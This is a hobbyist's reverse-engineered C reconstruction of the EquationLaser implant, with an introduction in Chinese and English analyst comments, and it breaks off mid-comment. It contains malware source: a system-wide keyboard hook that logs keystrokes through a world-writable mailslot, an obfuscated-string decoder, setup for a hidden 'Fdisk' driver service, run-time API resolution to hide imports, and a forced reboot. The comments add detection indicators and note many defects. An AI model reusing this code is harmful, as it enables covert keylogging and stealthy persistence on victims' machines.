EquationLaser是方程式样本中较早的一个,从它所用编程技巧的"古老"程度就可以看出来。当然对于我这种编程经验比较欠缺的爱好者,还是值得学习研究一下的。它会收集一些系统信息、键盘记录等。本来在资源里有个驱动文件,但是样本里的驱动已经释放出去,数据全为零,所以主要的功能应该还没分析到。
(仅供参考)
#include"stdafx.h"
#include<stdio.h>
#include<aclapi.h>
#include<process.h>
#include<winsock2.h>
#include<winuser.h>
#include<winnt.h>
#include<windows.h>
// Globals reconstructed from the sample. Names of the form dword_XXXXX are the
// disassembler's labels for unidentified data; their meaning is only what the
// code on this page reads from or writes into them.
WORD MaxUdpDg=0;//word_100509c0  -- filled from WSAData.iMaxUdpDg in _WSAStartup()
// dword_1f74c: set to 1 for the NT family (NewThread); gates OpenServiceManager()
//              and the SetSecurityInfo() call in do_read_mailslot().
// dword_1f750: set to 1 when the major version is 5 (NewThread); not read on this page.
// dword_1f754: set to 1 on version 4.90 (NewThread); not read on this page.
// dword_6a010: "logging active" flag shared between the hook procedure (record)
//              and the mailslot reader thread (do_read_mailslot).
// dword_69f84 / dword_69f88: cache flag and cached result of check_version().
DWORD dword_69f84,dword_69f88,dword_1f74c,dword_1f750,dword_1f754,dword_6a010;
LONG Addend=0;// attach counter maintained with InterlockedIncrement/Decrement in DllMain
bool IsDeviceOpen=false,IsExitWinNeeded;// IsExitWinNeeded is only ever written `false` on this page, so the reboot path at detach is always taken
HANDLE hDevice=INVALID_HANDLE_VALUE,hHandle=INVALID_HANDLE_VALUE,hThread=INVALID_HANDLE_VALUE,hmod=INVALID_HANDLE_VALUE;
// hDevice: handle to the driver device opened by load_driver_get_handle().
// hHandle: semaphore released in DllMain detach; nothing on this page creates it.
// hThread: the worker thread started in DllMain (NewThread).
// hmod:    this DLL's own HINSTANCE, passed to SetWindowsHookExA as the hook module.
OSVERSIONINFOA Size;// OS version record filled once in NewThread, read by device_io_control_2224d8
HHOOK hhk[3];// keyboard hook handles indexed by hhook_num; no bounds check in set_hook/unset_hook
// Host artifact: the mailslot the hook procedure writes keystroke records to.
// A mailslot with this name on a host is the most direct indicator that this
// component is active. The literal is 23 characters + NUL in a 0x30-byte buffer.
char mailslot_name[0x30]="\\\\.\\mailslot\\__MS_1509_";
char Name[4076];// receives a copy of mailslot_name (lstrcpynA in do_read_mailslot); the path record() opens
// Function-pointer types for APIs resolved at run time with GetProcAddress
// (keeps the token/ACL APIs out of the import table). They are declared as
// returning 1-byte `bool` while the real exports return 4-byte BOOL, which makes
// the `==true` comparisons in ShutdownPrivilege fragile. Identifiers starting
// with `_` + uppercase are reserved for the implementation.
typedef bool(WINAPI *_OpenProcessToken)(HANDLE ProcessHandle,DWORD DesiredAccess,PHANDLE TokenHandle);
typedef bool(WINAPI *_LookupPrivilegeValue)(LPCTSTR lpSystemBame,LPCTSTR lpName,PLUID lpLuid);
typedef bool(WINAPI *_AdjustTokenPrivileges)(HANDLE TokenHandle,BOOL DisableAllPrivileges,PTOKEN_PRIVILEGES NewState,
DWORD BufferLength,PTOKEN_PRIVILEGES PreviousState,PDWORD ReturnLength);
typedef DWORD(WINAPI *_SetSecurityInfo)(HANDLE handle,SE_OBJECT_TYPE ObjectType,SECURITY_INFORMATION SecurityInfo,
PSID psidOwner,PSID psidGroup,PACL pDacl,PACL pSacl);
// Prototypes. version_info() is declared here and called from DllMain, but the
// function defined below is named version(); treat them as the same routine.
int version_info();
int OpenServiceManager();
void compute_seed(int *a,int *b,int *c);
void ShutdownPrivilege();
unsigned int _stdcall NewThread(LPVOID para);
LRESULT fn(int code,WPARAM wParam,LPARAM lParam);
// DllMain: entry point of the keylogger/collector DLL.
// Process attach: on a supported OS (version_info()==0, see version() below) the
// worker thread NewThread is started with a 1 MiB stack (0x100000) when the
// Addend counter is zero, and this DLL's module handle is kept in hmod for
// SetWindowsHookExA; Addend is then incremented.
// Process detach: decrements Addend, closes the driver device, releases the
// hHandle semaphore, sleeps 3 s (0xbb8 ms) and -- because IsExitWinNeeded is
// only ever written `false` on this page -- enables the shutdown privilege and
// calls ExitWindows(6,0), i.e. EWX_REBOOT|EWX_FORCE. Unloading this DLL from a
// process therefore ends in a forced reboot, a side effect responders can
// correlate with the host process exiting.
// Sleep(), ExitWindows() and thread creation all run under the loader lock here;
// the sample accepts that hazard.
BOOL APIENTRY DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
{
switch(fdwReason)
{
case DLL_PROCESS_ATTACH://1
{
if(version_info()==0)// 0 == supported platform (declared as version_info, defined as version)
{
if(Addend==0)// worker thread started only while the counter is zero
{
hThread=(HANDLE)_beginthreadex(0,0x100000,&NewThread,0,0,0);
if(hThread!=NULL)
{
IsExitWinNeeded=false;
}
else
{
return true;// thread start failed, yet the DLL reports success and stays loaded
}
}
hmod=hinstDLL;// module handle later passed to SetWindowsHookExA (set_hook)
InterlockedIncrement(&Addend);
}
break;
}
/*
case DLL_THREAD_ATTACH://2
{
break;
}
case DLL_THREAD_DETACH://3
{
break;
}
*/
case DLL_PROCESS_DETACH://0
{
//
if(version_info()==0)
{
InterlockedDecrement(&Addend);
if(Addend==0)// plain (non-atomic) re-read of the counter after the decrement
{
//sub_1000f7fb  -- last-detach cleanup routine, not reconstructed on this page
}
if(IsDeviceOpen!=false)
{
if(hDevice!=INVALID_HANDLE_VALUE)
{
CloseHandle(hDevice);
}
else
{
// As transcribed the reset sits on the else branch, i.e. it only runs when
// nothing was open; it was presumably meant to follow CloseHandle -- verify against the sample.
hDevice=NULL;
IsDeviceOpen=false;
}
}
ReleaseSemaphore(hHandle,7,0);// hHandle is never created on this page; release count 7
Sleep(0xbb8);// 3000 ms
if(IsExitWinNeeded==false)
{
ShutdownPrivilege();// enable the shutdown privilege on our token (see below)
ExitWindows(6,0);// EWX_REBOOT|EWX_FORCE: forced reboot, applications get no chance to save
}
}
break;
}
}
return TRUE;
}
// version(): classifies the running OS from the packed DWORD returned by
// GetVersion(). Declared and called as version_info() elsewhere on this page.
// Returns 0 when the platform is one the sample runs on, 1 otherwise:
//   bit 31 clear -> Windows NT family: NT 3.x only from 3.50 (minor >= 0x32),
//                   any NT 4.0 or later accepted;
//   bit 31 set   -> Win32s / Windows 9x family: accepted from major 4 upward.
int version()
{
DWORD dwVersion=0;
DWORD dwMajorVersion=0;
DWORD dwMiniorVersion=0;
DWORD dwBuild=0;
dwVersion=GetVersion();
// printf("dwVersion:%8x\n",dwVersion);
//get windows version: low byte = major, next byte = minor, high word = build number (NT)
dwMajorVersion=(DWORD)(LOBYTE(LOWORD(dwVersion)));
dwMiniorVersion=(DWORD)(HIBYTE(LOWORD(dwVersion)));
dwBuild=(DWORD)(HIWORD(dwVersion));// only used by the commented-out printf
//printf("Version is %d.%d (%d)\n",dwMajorVersion,dwMiniorVersion,dwBuild);
if(dwVersion<0x80000000)// bit 31 clear: Windows NT platform
{
if(dwMajorVersion==3)
{
if(dwMiniorVersion>=0x32)// NT 3.50 or 3.51
{
return 0;
}
else
{
return 1;// NT 3.1 rejected
}
}
else
{
return 0;// NT 4 and later
}
}
else
{
if(dwMajorVersion>=4)// Windows 95 and later
{
return 0;
}
else
{
return 1;// Win32s on Windows 3.x rejected
}
}
}
// NewThread: worker thread started from DllMain (1 MiB stack). Records the OS
// version in the global Size, derives the platform flags dword_1f74c/1f750/1f754,
// then on the NT family waits for the Service Control Manager to become reachable.
// Returns 0 on every path; whatever follows OpenServiceManager() in the sample is
// not reconstructed here.
unsigned int _stdcall NewThread(LPVOID para)
{
//
SetThreadPriority(GetCurrentThread(),0);// 0 == THREAD_PRIORITY_NORMAL
SetErrorMode(0x8003);// SEM_FAILCRITICALERRORS|SEM_NOGPFAULTERRORBOX|SEM_NOOPENFILEERRORBOX:
// no crash or "insert disk" dialogs from this process, so a failing payload stays silent
Size.dwOSVersionInfoSize=0x94;// 148 == sizeof(OSVERSIONINFOA)
if(GetVersionExA(&Size)==1)
{
// As transcribed this compares the size field (just set to 0x94) against 2 and can
// never be true. The intended field is presumably dwPlatformId, where
// VER_PLATFORM_WIN32_NT == 2 -- consistent with dword_1f74c being the "NT" flag below.
if(Size.dwOSVersionInfoSize==2)
{
dword_1f74c=1;// NT family
if(Size.dwMajorVersion==5)
{
dword_1f750=1;// major 5: Windows 2000 / XP / Server 2003 generation
}
}
else
{
if((Size.dwMajorVersion==4)&&(Size.dwMinorVersion==0x5a))// 4.90 == Windows Me
{
dword_1f754=1;
dword_1f74c=1;// Me takes the same SCM/ACL code paths as NT
}
else
{
dword_1f754=0;
}
}
}
if(dword_1f74c==1)
{
if(OpenServiceManager()!=0)// as written OpenServiceManager() always returns 0, so this never fires
{
return 0;
}
}
/*
*/
return 0;
}
// OpenServiceManager: probes whether the SCM can be opened with full rights
// (0xf003f == SC_MANAGER_ALL_ACCESS, which requires an administrative token) and
// retries every 60 s (0xea60 ms) until it can. Always returns 0.
// Transcription note: OpenSCManagerA returns NULL on failure, not
// INVALID_HANDLE_VALUE, so as written the retry never triggers and a NULL handle
// reaches CloseServiceHandle; the recursive call's result is discarded as well.
int OpenServiceManager()
{
SC_HANDLE sc_handle=INVALID_HANDLE_VALUE;
sc_handle=OpenSCManagerA(0,0,0xf003f);// local machine, default database, SC_MANAGER_ALL_ACCESS
if(sc_handle==INVALID_HANDLE_VALUE)
{
Sleep(0xea60);// 60 000 ms between attempts
OpenServiceManager();// recursion in place of a loop; return value ignored
}
CloseServiceHandle(sc_handle);
return 0;
}
// decode: in-place decoder for the sample's obfuscated strings. A small
// keystream generator (seeded 0x9ea6/0x4f53/0x7; the step is the same arithmetic
// as compute_seed()) is advanced once per byte, and the byte is XORed with the
// generator's first word shifted right by `shift`. The shift for the next byte
// is the low three bits of the current byte *before* it is transformed
// (initially 3). Exactly `length` bytes are processed and the loop only stops
// when the count reaches zero, so callers must not pass a negative length.
void decode(char *string,int length)
{
    int seed_a = 0x9ea6, seed_b = 0x4f53, seed_c = 0x7;
    int shift = 3;
    for (int pos = 0; length != 0; pos++, length--) {
        // one generator step (identical to compute_seed())
        int rotated = (8 * seed_a) | (seed_a >> 13);
        seed_a ^= seed_b;
        seed_b = seed_c ^ (rotated & 0xfff8);
        seed_c = rotated & 7;
        // the next shift amount is taken from the untouched input byte
        int next_shift = string[pos] & 7;
        string[pos] = (char)((seed_a >> shift) ^ string[pos]);
        shift = next_shift;
    }
}
// compute_seed: one step of the keystream generator used by decode(). The state
// is three ints passed by pointer and updated in place:
//   rotated = a*8 | a>>13   (for a state that fits in 16 bits this is a 16-bit
//                            rotate-left by 3; multiply rather than << so a
//                            negative *a is never left-shifted)
//   a' = a ^ b
//   b' = c ^ (rotated & 0xfff8)   -- the high 13 bits of the rotation
//   c' = rotated & 7              -- the low 3 bits of the rotation
// The writes happen in that order through the pointers, so aliased arguments
// behave exactly as in the original statement sequence.
void compute_seed(int *a,int *b,int *c)
{
    const int rotated = (8 * (*a)) | ((*a) >> 13);
    *a ^= *b;
    *b = (*c) ^ (rotated & 0xfff8);
    *c = rotated & 7;
}
// GetRegkeyReady: creates the service registry key for the kernel driver the
// sample loads later (see load_driver_get_handle) and writes the three values
// the SCM needs: Type=1 (SERVICE_KERNEL_DRIVER), Start=3 (SERVICE_DEMAND_START),
// ErrorControl=0 (SERVICE_ERROR_IGNORE). No ImagePath is written on this page.
// Returns 1 when all three values were written, 0 otherwise.
// Host artifact: HKLM\System\CurrentControlSet\Services\Fdisk -- a driver
// service named "Fdisk" with no installer trail is worth alerting on.
// Transcription notes: `Class` is passed uninitialized as lpClass (NULL is the
// normal value); 0x0f003f == KEY_ALL_ACCESS; the `4` in RegSetValueEx is
// REG_DWORD and `&data` needs a (const BYTE *) cast to compile.
int GetRegkeyReady()
{
char *Class;// uninitialized; reading it below is undefined behaviour as written
int finished=0;
DWORD dwDisposition,data;
HKEY hkResult;
if(RegCreateKeyExA(HKEY_LOCAL_MACHINE/*0x80000002*/,"System\\CurrentControlSet\\Services\\Fdisk",0,Class,0,0x0f003f,
0,&hkResult,&dwDisposition)==0)// ERROR_SUCCESS; dwDisposition (created vs opened) is not examined
{
data=1;// SERVICE_KERNEL_DRIVER
if(RegSetValueEx(hkResult,"Type",0,4,&data,4)==0)
{
data=3;// SERVICE_DEMAND_START: loaded on request, not at boot
if(RegSetValueEx(hkResult,"Start",0,4,&data,4)==0)
{
data=0;// SERVICE_ERROR_IGNORE: a failed load is not reported
if(RegSetValueEx(hkResult,"ErrorControl",0,4,&data,4)==0)
{
finished=1;
}
}
}
RegCloseKey(hkResult);
}
return finished;
}
// load_driver_get_handle: opens the control device of the "Fdisk" driver and
// stores the handle in the global hDevice. Returns 1 on success, 0 on failure.
// The three-step comment inside is the analyst's summary of the loading
// sequence (privilege, NtLoadDriver lookup, NtLoadDriver on the Fdisk service
// key); none of those steps is reconstructed here, only the final CreateFileA.
// Transcription note: in the C literal "\\.\fdisk0" the `\f` is a form-feed
// escape, so the string as written is not the \\.\fdisk0 device path the
// comment describes. Flags: 0xc0000000 == GENERIC_READ|GENERIC_WRITE, no
// sharing, 3 == OPEN_EXISTING, 0x80 == FILE_ATTRIBUTE_NORMAL.
// Host artifact: a device object / symbolic link named fdisk0.
bool load_driver_get_handle()
{
/*
1,get load driver privilege
2,get address of NtLoadDriver(IN PUNICODE_STRING DriverServiceName)
3,load driver by call NtLoadDriver(\Registry\Machine\System\CurrentControlSet\Services\Fdisk)
*/
hDevice=CreateFileA("\\.\fdisk0",0xc0000000,0,0,3,0x80,0);
return hDevice==INVALID_HANDLE_VALUE?0:1;
}
// device_io_control_2224d8: on the NT family sends control code 0x2224d8 to the
// driver device opened by load_driver_get_handle, with no input or output
// buffer. 0x2224d8 decodes as CTL_CODE(FILE_DEVICE_UNKNOWN /*0x22*/, function
// 0x936, METHOD_BUFFERED, FILE_ANY_ACCESS); what the driver does with it is not
// known (the driver body in the sample was zeroed, per the page intro).
// Returns false when the device is not open or the IOCTL fails. Transcription
// note: there is no return on the success path nor on non-NT platforms, so the
// result is indeterminate there (undefined behaviour for a non-void function).
bool device_io_control_2224d8()
{
DWORD ByteReturned=0;
if(Size.dwPlatformId==VER_PLATFORM_WIN32_NT)// Size is filled in NewThread
{
if(hDevice!=INVALID_HANDLE_VALUE)
{
if(false==DeviceIoControl(hDevice,0x2224d8,0,0,0,0,&ByteReturned,0))// synchronous, no buffers either way
{
return false;
}
}
else
{
return false;
}
}
}
// get_hardware_info: reads one 32-bit PCI configuration register through the
// legacy ports 0xCF8 (CONFIG_ADDRESS) and 0xCFC..0xCFF (CONFIG_DATA). The asm
// saves the current CONFIG_ADDRESS, writes `address` with its low two bits
// cleared, reads the dword from port 0xCFC + (address & 3), then restores the
// saved CONFIG_ADDRESS and leaves the value read in eax. Port `in`/`out` need
// ring 0 (or IOPL), so this either belongs to the driver or depends on it --
// not determinable from this page; presumably used for host fingerprinting.
// Transcription note: the asm is commented out and the C body is empty, so as
// written the function returns nothing (undefined behaviour).
DWORD get_hardware_info(DWORD address)//get some hardware information
{
DWORD num1,num2,num3;// num3 is unused in the asm below
/*
mov dx,0cf8h
in eax,dx
mov num2,eax
mov ecx,address
mov num1,0cf8h
mov eax,ecx
and al,0fch
mov address,eax
out dx,eax
and ecx,3
add ecx,0cfch
mov address,ecx
mov dx,address
in eax,dx
mov num1,eax
mov ecx,num2
mov num2,0cf8h
and ecx,0fffffffch
mov address,ecx
mov dx,num2
mov eax,address
out dx,eax
;
mov eax,num1
*/
}
// check_version: cached test for the NT family. dword_69f88 holds the answer
// (1 == NT) and dword_69f84 marks the cache as filled. Returns dword_69f88.
// Transcription notes (the reconstructed conditions are inverted / incomplete):
//  - the outer test would have to be dword_69f84==0 for the cache ever to be
//    computed, since nothing on this page sets dword_69f84 beforehand;
//  - GetVersionExA returns non-zero on *success*, so as written the error box
//    and exit(2) fire on success;
//  - `VER_PLATFORM_WIN32_NT==version_info` compares against the whole struct;
//    the intended field is version_info.dwPlatformId.
// Functionally this duplicates the platform test NewThread stores in dword_1f74c.
bool check_version()//VER_PLATFORM_WIN32_NT
{
OSVERSIONINFOA version_info;// local shadows the version_info() prototype
version_info.dwOSVersionInfoSize=0x94;// 148 == sizeof(OSVERSIONINFOA)
if(dword_69f84!=0)
{
if(0!=GetVersionExA(&version_info))
{
MessageBoxA(NULL,"Failed to get Windows version",NULL,NULL);// visible dialog: a UI artifact on the host
exit(2);// terminates the hosting process
}
else
{
if(VER_PLATFORM_WIN32_NT==version_info)
{
dword_69f84=1;
dword_69f88=1;
}
else
{
dword_69f88=0;
}
}
}
return dword_69f88;
}
// ShutdownPrivilege: enables a privilege on the current process token so that
// the ExitWindows(EWX_REBOOT|EWX_FORCE) in DllMain succeeds. The three token
// APIs are resolved from ADVAPI32.DLL at run time instead of being imported,
// which keeps the import table uninformative; look for the LoadLibrary /
// GetProcAddress pair rather than for static imports.
// Transcription notes:
//  - "LookupPrivilegeValue" is not an export name (only the A/W variants are),
//    so as written GetProcAddress would fail and nothing below it would run;
//  - "SeShutdownDriverPrivilege" is not a standard privilege name either; the
//    comment on the signature says SeLoadDriverPrivilege and the caller needs
//    SeShutdownPrivilege -- which one the binary uses must be read off the sample;
//  - `handle` is uninitialized, so the CloseHandle at the bottom reads garbage
//    whenever a step before OpenProcessToken fails;
//  - the function-pointer typedefs return 1-byte bool while the APIs return
//    BOOL, which makes the `==true` comparisons fragile.
// 0x28 == TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY; 0x10 == sizeof(TOKEN_PRIVILEGES).
void ShutdownPrivilege()//SeLoadDriverPrivilege
{
int ret=0;// unused
HMODULE hObject;
HANDLE handle;// uninitialized (see note above)
LUID l_luid={0};
TOKEN_PRIVILEGES l_token_privilege={0};
_OpenProcessToken l_OpenProcessToken;
_LookupPrivilegeValue l_LookupPrivilegeValue;
_AdjustTokenPrivileges l_AdjustTokenPrivileges;
hObject=LoadLibrary("ADVAPI32.DLL");
if(hObject!=NULL)
{
l_OpenProcessToken=(_OpenProcessToken)GetProcAddress(hObject,"OpenProcessToken");
if(l_OpenProcessToken!=0)
{
l_LookupPrivilegeValue=(_LookupPrivilegeValue)GetProcAddress(hObject,"LookupPrivilegeValue");// no such export; real names end in A/W
if(l_LookupPrivilegeValue!=0)
{
l_AdjustTokenPrivileges=(_AdjustTokenPrivileges)GetProcAddress(hObject,"AdjustTokenPrivileges");
if(l_AdjustTokenPrivileges!=0)
{
if(l_OpenProcessToken(GetCurrentProcess(),0x28,&handle)==true)// TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY
{
if(l_LookupPrivilegeValue(0,"SeShutdownDriverPrivilege",&l_luid)==true)// non-standard name as transcribed
{
l_token_privilege.Privileges->Luid.HighPart=l_luid.HighPart;// Privileges-> is Privileges[0].
l_token_privilege.Privileges->Luid.LowPart=l_luid.LowPart;
l_token_privilege.Privileges->Attributes=SE_PRIVILEGE_ENABLED;
l_token_privilege.PrivilegeCount=1;
l_AdjustTokenPrivileges(handle,false,&l_token_privilege,0x10,0,0);// result unchecked; can "succeed" with ERROR_NOT_ALL_ASSIGNED
//if(GetLastError()==0)
//{
// if(handle!=NULL)
// CloseHandle(handle);
// FreeLibrary(hObject);
//}
}
}
}
}
}
}
if(handle!=NULL)
CloseHandle(handle);
if(hObject!=NULL)
FreeLibrary(hObject);
}
// _WSAStartup: initialises Winsock at the requested version and records the
// reported maximum UDP datagram size in the global MaxUdpDg. Returns 0 on
// success and 1 when WSAStartup fails, the negotiated version is below the
// requested one, or fewer than `socket_num` sockets are offered.
// Notes: on the two post-startup failures the successful WSAStartup is not
// undone with WSACleanup, leaving a reference behind; iMaxSockets/iMaxUdpDg are
// only meaningful for Winsock 1.x, which dates the sample; the else-if
// condition is always true once the first test has failed, so the fall-off-the-end
// path (no return) is unreachable in practice. The leading `_` + capital is a
// reserved identifier form.
int _WSAStartup(WORD wVersionRequested,char socket_num)
{
WSAData wsaData;
if(0!=WSAStartup(wVersionRequested,&wsaData))
{
return 1;
}
if(LOBYTE(wsaData.wVersion)<LOBYTE(wVersionRequested)||HIBYTE(wsaData.wVersion)<HIBYTE(wVersionRequested))// LOBYTE = major, HIBYTE = minor
{
return 1;// negotiated version too low (no WSACleanup)
}
else if(LOBYTE(wsaData.wVersion)!=LOBYTE(wVersionRequested)||(LOBYTE(wsaData.wVersion)==LOBYTE(wVersionRequested)&&HIBYTE(wsaData.wVersion)>=HIBYTE(wVersionRequested)))// always true here
{
if(wsaData.iMaxSockets<socket_num)
{
return 1;// not enough sockets advertised (no WSACleanup)
}
MaxUdpDg=wsaData.iMaxUdpDg;
return 0;
}
}
// windows_hook: installs (set_or_unset != 0) or removes (== 0) the keyboard
// hook on a given desktop. Hooks are per-desktop, so the routine first switches
// the process to the interactive window station "winsta0" and this thread to
// desktop `lpszDesktop`, performs the hook call, then switches back. Returns 1
// only through the final CloseDesktop check, otherwise 0. The do{}while(0) is a
// break-based substitute for goto cleanup.
// Detection angle: a process that is not the interactive shell calling
// OpenWindowStationA("winsta0") with WINSTA_ALL_ACCESS, then SetThreadDesktop
// and SetWindowsHookExA, is the classic desktop-hopping keylogger sequence.
// Transcription notes: the HDESK returned by OpenDesktopA is stored back into
// the char* parameter; unset_hook() is called without the index its definition
// takes; the last condition mixes "restore failed" (0==...) with "close
// succeeded" (CloseWindowStation truthy), so ret==1 is reached on an odd mix.
int windows_hook(char *lpszDesktop,int hhook_num,int set_or_unset)
{
int ret=0;
HWINSTA hWinSta=NULL;
HWINSTA hWinSta0=NULL;
HDESK hDesktop=NULL;
do
{
hWinSta=GetProcessWindowStation();// remember the current station to restore later
if(hWinSta==NULL)
{
ret=0;
break;
}
hDesktop=GetThreadDesktop(GetCurrentThreadId());// and the current desktop
if(hDesktop==NULL)
{
ret=0;
break;
}
hWinSta0=OpenWindowStationA("winsta0",false,WINSTA_ALL_ACCESS);// the interactive session's station
if(hWinSta0==NULL)
{
ret=0;
break;
}
if(false==SetProcessWindowStation(hWinSta0))
{
ret=0;
break;
}
lpszDesktop=OpenDesktopA(lpszDesktop,0,false,MAXIMUM_ALLOWED);// HDESK stored into the char* parameter
if(lpszDesktop==NULL)
{
ret=0;
break;
}
if(false==SetThreadDesktop(lpszDesktop))
{
ret=0;
break;
}
if(set_or_unset==0)
{
unset_hook();// definition takes hhook_num
}
else
{
if(0==set_hook(hhook_num))
{
ret=0;
break;
}
}
if(0==SetProcessWindowStation(hWinSta)||0==SetThreadDesktop(hDesktop)||CloseWindowStation(hWinSta0))// restore original station/desktop
{
ret=CloseDesktop(lpszDesktop)?1:0;
}
}while(0);
return ret;
}
// set_hook: installs a system-wide WH_KEYBOARD hook (dwThreadId == 0 covers
// every thread on the current desktop) with this DLL (hmod) as the hook module,
// so the system maps this DLL into each GUI process on that desktop -- the
// injection vector for the logger. The handle is stored in hhk[hhook_num];
// returns 1 when it is non-NULL.
// Notes: hhook_num is not range-checked against the 3-entry hhk array, and the
// InterlockedExchange call passes HHOOK* where LONG* is expected (transcription).
int set_hook(int hhook_num)//record key stroke
{
HHOOK hook=NULL;
Sleep(0);// yield once before installing
hook=SetWindowsHookExA(WH_KEYBOARD,(HOOKPROC)fn,hmod,0);// fn below is the hook procedure
InterlockedExchange(hhk+hhook_num,hook);
return hhk[hhook_num]?1:0;
}
// unset_hook: removes the keyboard hook stored in hhk[hhook_num], if any, and
// clears the slot. Called from windows_hook (there without the index argument).
// hhook_num is not range-checked against the 3-entry array.
void unset_hook(int hhook_num)
{
if(hhk[hhook_num]!=NULL)
{
Sleep(0);// yield once before unhooking
UnhookWindowsHookEx(hhk[hhook_num]);
hhk[hhook_num]=NULL;
}
}
// fn: the keyboard hook procedure registered by set_hook; delegates to record().
// Transcription notes: a real HOOKPROC uses the CALLBACK calling convention;
// `hhk` here is the whole hook array, while record() expects one HHOOK (hhk[n]).
LRESULT fn(int code,WPARAM wParam,LPARAM lParam)
{
return record(hhk,code,wParam,lParam);
}
// record: body of the keyboard hook; runs inside every hooked GUI process. For
// HC_ACTION (code==0) events, while the dword_6a010 flag is set, it packs
// {process id, virtual-key code (wParam), key data (lParam)} into a small
// record and writes it to the path in Name -- the mailslot created by
// do_read_mailslot -- so every keystroke becomes one mailslot message to the
// collector thread. The event is always passed down the chain first, so typing
// is not disturbed.
// Transcription / defect notes: `CallnextHookEx` and `null` are not Win32
// identifiers (CallNextHookEx / NULL); buffer is 3 WORDs (6 bytes) but 8 bytes
// are written, reading 2 bytes past it; wParam/lParam are truncated to 16 bits;
// after a failed CreateFile the WriteFile still runs on INVALID_HANDLE_VALUE;
// the handle is closed only when WriteFile succeeds, so it leaks on failure.
int record(HHOOK hhk,int code,WPARAM wParam,LPARAM lParam)
{
HANDLE file=INVALID_HANDLE_VALUE;
DWORD NumberOfBytesWritten=0;
WORD buffer[3]={0};// 6 bytes, yet 8 are written below
LONG result=0;
result=CallnextHookEx(hhk,code,wParam,lParam);// pass the keystroke on (CallNextHookEx)
if(code==0)// HC_ACTION
{
if(dword_6a010!=0)// collector thread has the mailslot open
{
buffer[0]=GetCurrentProcessId();// truncated to 16 bits
buffer[1]=wParam;// virtual-key code
buffer[2]=lParam; //0X40000000 1 3  -- repeat count / scan code / transition bits, truncated to 16 bits
file=CreateFile(Name,GENERIC_WRITE,FILE_SHARE_DELETE,null,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);// Name holds the mailslot path
if(INVALID_HANDLE_VALUE==file)
{
dword_6a010=0;// stop logging from this process -- but no early return, WriteFile still runs
}
if(true==WriteFile(file,buffer,8,&NumberOfBytesWritten,NULL))// one 8-byte mailslot message per keystroke
{
CloseHandle(file);// closed only on success
dword_6a010=1;
}
}
}
return result;
}
// do_read_mailslot: collector thread. `lParam` points at a configuration block
// of which two fields are used here: a log-file path at +0x2c0 and a maximum
// log size (DWORD) at +0x2bc. Opens/creates the log, seeks to its end and gives
// up (cleanup + thread exit code 1) if it is already over the limit. Otherwise
// it creates the mailslot named in mailslot_name (copied into Name, which
// record() opens) and loops: read one mailslot message (<= 0x50 bytes) through
// read_mailslot (not on this page), append it to the log, sleep 250 ms (0xfa),
// until dword_6a010 drops to 0.
// On the NT family the mailslot's DACL is replaced first: SetSecurityInfo with
// SECURITY_INFORMATION 4 -- DACL_SECURITY_INFORMATION; the transcript spells it
// with the unrelated PROCESS_SET_SESSIONID, which is also 4 -- and pDacl NULL,
// i.e. a NULL DACL granting everyone full access, so hooked processes in any
// logon session can post keystrokes. A mailslot with a NULL DACL is itself a
// usable detection signal.
// Transcription notes: ERROR_SUCCESSW (ERROR_SUCCESS); Clean_hook_and_key vs
// clean_hook_and_key (only the lowercase stub is defined below);
// `(PVOID)lParam+0x2bc` is arithmetic on void*; WriteFile is called with both
// lpNumberOfBytesWritten and lpOverlapped NULL (not permitted); the size-limit
// test inside the loop compares one message's size instead of the running total
// bytes_num; several paths reach the end of the function without a return.
DWORD WINAPI do_read_mailslot(LPARAM lParam)
{
char buffer[0x50];// one mailslot message, 80 bytes max
DWORD bytes_num=0,nNumberOfBytesToWrite;
HANDLE hObject=INVALID_HANDLE_VALUE;// the log file
HANDLE hMailslot=INVALID_HANDLE_VALUE;//4
HMODULE hModule=INVALID_HANDLE_VALUE;
_SetSecurityInfo l_SetSecurityInfo=NULL;
hObject=CreateFile((char *)lParam+0x2c0,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,NULL,NULL);// log path at config+0x2c0
if(INVALID_HANDLE_VALUE!=hObject)
{
bytes_num=SetFilePointer(hObject,0,NULL,FILE_END);// current log size; appends from here
if(bytes_num>*(DWORD *)((PVOID)lParam+0x2bc))// size limit at config+0x2bc
{
CloseHandle(hObject);
Clean_hook_and_key(lParam);
_endthreadex(1);
return 0;
}
lstrcpynA(Name,mailslot_name,0x103);// publish the mailslot path for record()
hMailslot=CreateMailslotA(Name,0,0,NULL);// no max message size, no read timeout
if(INVALID_HANDLE_VALUE==hMailslot)
{
CloseHandle(hObject);
clean_hook_and_key(lParam);
_endthreadex(1);
}
if(0!=dword_1f74c)// NT family: loosen the mailslot ACL
{
hModule=LoadLibraryA("advapi32.dll");
if(hModule)
{
l_SetSecurityInfo=(_SetSecurityInfo)GetProcAddress(hModule,"SetSecurityInfo");
if(NULL!=l_SetSecurityInfo)
{ //6
// SECURITY_INFORMATION 4 (DACL) with pDacl == NULL: NULL DACL, everyone gets full access
if(ERROR_SUCCESSW==l_SetSecurityInfo(hMailslot,SE_KERNEL_OBJECT,PROCESS_SET_SESSIONID,NULL,NULL,NULL,NULL))
{
nNumberOfBytesToWrite=0;
dword_6a010=1;// tells the hook procedure it may start sending
do
{
nNumberOfBytesToWrite=0x50;
if(0!=read_mailslot(hMailslot,buffer,&nNumberOfBytesToWrite))// helper not on this page
{
if(nNumberOfBytesToWrite>0)
{
if(true==WriteFile(hObject,buffer,nNumberOfBytesToWrite,NULL,NULL))// both trailing args NULL: not permitted
{
bytes_num+=nNumberOfBytesToWrite;
if(nNumberOfBytesToWrite>=*(DWORD *)((char *)lParam+0x2bc))// compares one message; bytes_num presumably intended
{
dword_6a010=0;
}
}
}
}
else
{
dword_6a010=0;// read failure ends the session
}
Sleep(0xfa);// 250 ms poll interval
}while(dword_6a010);
CloseHandle(hObject);
CloseHandle(hMailslot);
clean_hook_and_key(lParam);
return 0;
}
}
}
}
}
else
{
Clean_hook_and_key(lParam);
_endthreadex(1);
return 0;
}
}
// check_root_drive_info: reports whether the volume at lpRootPathName is NTFS
// and preserves ACLs (FILE_PERSISTENT_ACLS). Presumably used to decide whether
// ACLs can be applied to the log file -- the caller is not on this page.
// Returns true/false.
// Transcription notes: the parameter is a single char but is used as a path
// (char*); the last two arguments of GetVolumeInformation are swapped (buffer
